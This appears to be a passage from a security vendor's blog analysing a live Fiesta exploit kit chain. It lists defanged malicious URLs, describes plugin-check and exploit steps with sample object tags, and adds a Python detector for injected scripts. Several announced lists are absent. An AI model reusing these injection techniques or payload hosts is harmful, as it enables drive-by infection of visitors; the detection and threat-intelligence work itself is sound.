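The prefix match is deliberately loose (any "() { ... };" rather than the canonical "() { :;};") because attackers vary the function body, and the exploit string can sit in any header, which is why the whole line is searched rather than just the User-Agent field. The extracted URLs are the ones worth pulling and blocking, since the same download host tends to serve several of the scripts described above.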
It is extremely important for system administrators to test whether their servers are vulnerable and to apply the appropriate security patches as described in our previous blog. It is also important to check for the indicators of compromise mentioned in the attack cases above.

Zscaler customers are protected from this threat and the associated malware payloads. Zscaler ThreatLabZ is actively monitoring this threat and associated attacks in the wild.

Monday, September 29, 2014

Fiesta Exploit Kit: Live Infection

During our daily hunt for exploit kits (EK), we came across many live Fiesta exploit chains. The infections started from the following compromised domains:

Compromised sites:

Attackers often leverage compromised sites as the first level of redirection in the EK infection cycle. In the first Fiesta EK instance we analyzed, the attacker, after compromising the site, modified the "scripts.js" file present at:
  •       hxxp://www[.]media[.]orpi[.]com/js/scripts.js
All the pages importing this JavaScript file will redirect the user to "nvplus[.]com/wp-content/".

Another variation of the initial loading page redirection was observed in the compromised site “interfacelift[.]com” at the following location:
  •       hxxp://interfacelift[.]com/wallpaper/downloads/date/any/   
In this case the attacker added a <script> tag with the location pointing to another redirection site at:
  •          hxxp://sunduk[.]biz/forum/docs/

A third variation of the initial redirection was observed on the compromised site "soyentrepreneur[.]com", where the attacker created a new JavaScript file "funcionesCarga.js" at the following locations:
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/funcionesCarga.js
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/se2013/funcionesCarga.js
The website pages importing these JavaScript files will redirect the user to the Fiesta loading site.

All three initial redirection methods are fairly stealthy and can go unnoticed by web administrators for days. We found this approach more effective than, and the opposite of, the RIG EK compromise we recently analyzed, where the attacker changed the site's home page to force the redirection.
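An added example, not code from the original post: two checks a web administrator can script to catch the injection variants described above, namely a <script> tag whose source is on a foreign host and lines appended to an existing site script such as scripts.js. The sample page, scripts, allowlisted CDN and the placeholder redirector host are constructed for this example and do not reproduce the real compromised sites.

```python
"""Added example (not code from the original post): two checks a web
administrator can run to spot the kind of injection described above, namely
a <script> tag pulling from a foreign host and lines appended to an existing
site script. The page, script contents, hosts and CDN allowlist below are
constructed; the redirector host is a placeholder, not the real one."""
import difflib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script sources and the body of each inline script."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._buf = None  # accumulates text while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def foreign_script_sources(html: str, page_host: str, allowlist=frozenset()) -> list:
    """Script tags whose host is neither the site itself nor an allowed CDN.
    Relative sources (no host) are the site's own and are skipped."""
    p = ScriptCollector()
    p.feed(html)
    flagged = []
    for src in p.srcs:
        host = urlsplit(src).netloc.lower()
        if host and host != page_host.lower() and host not in allowlist:
            flagged.append(src)
    return flagged


def suspicious_inline(html: str) -> list:
    """Inline scripts that write a frame or relocate the browser."""
    p = ScriptCollector()
    p.feed(html)
    keys = ("<iframe", "document.write", "location.href", "location.replace")
    return [s for s in p.inline if any(k in s for k in keys)]


def appended_lines(baseline_js: str, current_js: str) -> list:
    """Lines present in the live script but not in the known-good copy,
    i.e. what an attacker added to an existing file such as scripts.js."""
    diff = difflib.unified_diff(baseline_js.splitlines(), current_js.splitlines(),
                                lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


# Constructed inputs: a site page with one injected tag and one injected
# inline redirect, and a site script with a redirect appended.
PAGE_HOST = "www.example-site.test"
CDN_ALLOWLIST = frozenset({"cdn.example-cdn.test"})
SAMPLE_PAGE = """<html><head>
<script src="/js/scripts.js"></script>
<script src="//cdn.example-cdn.test/jquery.min.js"></script>
<script src="http://redirector.example/forum/docs/"></script>
</head><body>
<script>var pageId = 42;</script>
<script>document.write('<iframe src="http://redirector.example/wp-content/" width=1 height=1></iframe>');</script>
</body></html>"""
KNOWN_GOOD_JS = "function init() {\n  bindMenus();\n}\n"
LIVE_JS = KNOWN_GOOD_JS + "document.location.href='http://redirector.example/wp-content/';\n"

if __name__ == "__main__":
    print(foreign_script_sources(SAMPLE_PAGE, PAGE_HOST, CDN_ALLOWLIST))
    print(suspicious_inline(SAMPLE_PAGE))
    print(appended_lines(KNOWN_GOOD_JS, LIVE_JS))
```

The first check needs nothing but the served HTML and a short allowlist of hosts the site legitimately loads from; the second only works if a known-good copy of each script is kept (in version control or a file-integrity baseline), which is what makes the scripts.js modification above detectable at all.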

Fiesta EK:

Some of the recent live Fiesta EK loading sites found in the wild are:
  •        nvplus[.]com/wp-content/
  •        son-ko[.]com/scripts/bundles/login.php
  •        sunduk[.]biz/forum/docs/login.php
  •        toringaz[.]com/images/
  •        barferoase[.]de/blog/wp-content/themes/
  •        www.artlen[.]com/assets/cache/rss/
  •        www.courieru[.]com/cache/joomsef/
  •        www.roofstroy[.]com/stroy/js.php
  •        ticketstolisbon[.]com/dumper/
  •        talktyme[.]com/flash/
Apart from the usual EK redirection chain, it checks the user's browser as well as the presence of the Microsoft Silverlight and Adobe Flash plugins.

It checks whether the Silverlight plugin is installed by creating the following ActiveX object:
  •  ActiveXObject("AgControl.AgControl") 
The presence of the Flash plugin is checked by calling:
  • swfobject.embedSWF()
If both attempts throw an exception, the exploit cycle terminates; if vulnerable plugin versions are found, the user is taken to the EK landing page.

Redirection to Fiesta EK Landing page

Fiesta Landing Page:

First, the malicious Silverlight and Flash files are downloaded, since the plugin checks for them have already been performed.

AV detection for the downloaded malicious files:

  •       rtu.swf: 2/55 (Generic Exploit)
  •       rtp.xap: 2/54 (CVE-2013-0074)

Following this, the main controller of Fiesta EK is called. In one of the Fiesta EK instances we analyzed it was:
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/1
It generates the following GET requests to the same domain during the course of the exploit cycle:

  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/321eabf3f523be344045575e50595404020b045e5500560806060006515a5e04;120000;0
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/6ea46961ad8578015717000f07020406075c540f025b060a0351505706010e06
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/7a77e441c530b7c15419520c540f06060658020c5156040a02550654550c0c06;1;2@@
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/1b88a025c530b7c1521a5d03500b0002005b0d035552020e0456095b51080a02;1;3@@
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/675e60f2d4cb58ae5c59595e070b5405070e005e025256090303040606085e05
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/2a78dd2dfa898b9d5b045b03555f0053035802035006025f0755065b545c0a53
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/33603690d9fdeed05f5a540b020d0b07020a030b0754090b06070753030e0107;900
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/2a7f53d52bfa0822410d415d040856020358025d0151540e07550605050b5c02;5061118
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/61295aeb0e3b886755415902045a575507080702010355590305035a05595d55;5;1
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/3bb805820e3b886750120903010e0a05025b5703045708090656535b000d0005;6;1
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/535c3355fb26fbd956435e5802080702040a00580751050e00070400030b5405;1;1

Fiesta EK performs the following exploitation attempts, which result in the multiple GET requests:

Adobe Flash
  • Checks if Adobe Flash is installed and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded SWF file "rtu.swf".
  •       A sample object of type “application/x-shockwave-flash” with dynamic run-time parameters to run the exploit payload is created as shown below:
“<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='FnkwX'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='wetsgk=MWYzH'/><param name='Play' value='0'/></object>"

Microsoft Silverlight 
  • Checks if Microsoft Silverlight is installed in browser and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded XAP file "rtp.xap".
  • A sample object of type "application/x-silverlight" with dynamic run-time parameters to run the exploit payload is created as shown below:
"<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='LVSDE'/><param name='initParams' value=<LONG_STRING_VALUE></object>"

Oracle Java
  • Checks if the Java plugin is installed and enabled in the browser.
  • Downloads a malicious Java archive (JAR) based on the installed version:
    • JAR File -> ianlar.jar: 4/55 (CVE-2012-1723)
  • It then generates a subsequent GET request to fetch parameter values required to execute the malicious JAR payload.
  • Creates a custom applet tag utilizing the run-time parameter values to run the exploit payload as seen below:

Adobe Reader
  •        Checks for the presence of the Adobe Reader plugin.
  •        Downloads and executes the malicious PDF file: 
    •        PDF File -> Ianlar.pdf: 8/55  


Upon successful exploitation, Fiesta EK was observed installing a new variant of the Zemot Trojan from the following location:
  •       hxxp://warzine[.]su/b/shoe/54602
Zemot is a well-known click-fraud botnet family that will soon start click-fraud activity on the victim machine, making money for the malware authors.

This click-fraud malware family appears to be connected to many other EKs in addition to Fiesta. Some of the domains involved in the click-fraud activity:

The above domains were resolving to the following two servers, located in Russia and Ukraine respectively:
A GET request to any of these domains looks like this:

- Sameer Patil